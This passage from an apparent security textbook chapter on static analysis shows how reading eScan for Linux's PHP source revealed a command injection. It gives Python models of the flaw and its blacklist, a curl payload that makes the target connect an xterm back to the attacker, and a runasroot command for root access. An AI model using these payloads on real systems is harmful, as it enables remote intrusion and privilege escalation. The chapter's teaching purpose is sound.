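def build_command(uname, password, passfile, product):
    """Mirror of the string concatenation performed by check_user."""
    return f"{RUNASROOT} {PROG} {uname} {password} {passfile} {product}"


def build_command_quoted(uname, password, passfile, product):
    """Same command with every argument quoted for the shell."""
    args = [uname, password, passfile, product]
    return " ".join([RUNASROOT, PROG] + [shlex.quote(a) for a in args])


def shell_pieces(command):
    """Simplified model: an unquoted ';' separates shell commands."""
    return [piece.strip() for piece in command.split(";") if piece.strip()]


unsafe = build_command("valid@user.com", PAYLOAD, PASSFILE, "USERS")
for piece in shell_pieces(unsafe):
    print("command:", piece)

safe = build_command_quoted("valid@user.com", PAYLOAD, PASSFILE, "USERS")
print("quoted arguments:", shlex.split(safe))
```

In the unquoted form, only the first piece is handed to runasroot; the injected pieces are separate commands run by the shell as mwconf. In the quoted form, the payload stays a single argument to checkpass.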

You have one more problem: the space character is filtered out. This means that you cannot construct commands that take arguments, because spaces are forbidden. Does this mean that you are restricted to running one single command? Not quite, because you can use an old trick: you can run the command xterm, or any other X11 GUI application, telling it to connect back to you. However, because you cannot use spaces, you need to inject various commands, separated with the semicolon character. Also, there is one more detail: before executing the command, the script checks that the given username is valid. This is an unfortunate limitation, as it restricts your exploitation because you need to know at least one valid username. However, suppose you know a valid username (and it is not that difficult to guess in many situations); here is how your first attempt to exploit this bug might look:

$ curl --data \

"product=1&uname=valid@user.com&pass=;DISPLAY=YOURIP:0;xterm;" \

http://target:10080/login.php

When you run this command, the vulnerable machine tries to connect back to the X11 server running on your machine. Then, you can simply issue the following command from xterm to gain root privileges:

$ /opt/MicroWorld/sbin/runasroot bash

And you are done—you are now root in the vulnerable machine! This particular vulnerability was discovered exclusively by using static analysis. It would not have been possible, or at least easy, to discover the vulnerability using only dynamic analysis techniques, as you did not know its inner workings. In any case, different techniques may find different kinds of bugs.
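When reading a filter like the one in login.php, it helps to replay it offline and try candidate inputs before touching a live system. The sketch below reimplements the two password checks in Python with the same character class as the preg_match call; password_check is a hypothetical name, and the return values reuse the err_msg strings from the script. Python's strip() stands in for PHP's trim(), which is close enough for this purpose.

```python
import re

# Same character class as the preg_match call in login.php.
BLACKLIST = re.compile(r"""[|&)(!><'"` ]""")


def password_check(passwd):
    """Replay the length and character checks applied to the password."""
    passwd = passwd.strip()
    if len(passwd) < 5:
        return "password_len"
    if BLACKLIST.search(passwd):
        return "password_chars"
    return "ok"


candidates = [
    ";DISPLAY=YOURIP:0;xterm;",  # payload used in the text
    "ls -la /",                  # contains spaces
    "$(id)x",                    # contains parentheses
    ";id",                       # too short
]
for candidate in candidates:
    print(repr(candidate), "->", password_check(candidate))
```

Only the semicolon-separated payload passes both checks, which is exactly the gap that static reading of the regular expression revealed.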

Summary

Static analysis is a research method used to analyze code without actually executing it. Usually, this involves reading the source code of the said software, if it is available, and looking for security lapses that allow an attacker to exploit the software. If a product is closed source, then binary reverse-engineering is the way to go. IDA is the de facto tool for such tasks. With IDA's FLIRT technology, you can save time by avoiding reverse-engineering library functions compiled into the binary because FLIRT identifies them for you, thus leaving you more interesting pieces to reverse-engineer.

Additionally, the chapter presented two hands-on examples showing how to statically analyze source code and the disassembly of a closed-source program using IDA. Through reverse-engineering, a bug that can be exploited remotely was uncovered in the file format parser of an old version of F-Secure Anti-Virus for Linux. Similarly, we demonstrated a way to remotely inject commands and, thereafter, escalate privileges in the eScan antivirus for Linux administration console just by reading its PHP source code.

Static analysis has its limitations, especially when reverse-engineering a closed-source program would be very time-consuming or when the source code of a piece of software is too big to read and find bugs in. The next chapter will discuss dynamic analysis techniques that begin where static analysis left off, by analyzing the behavior of the program during runtime and finding security bugs.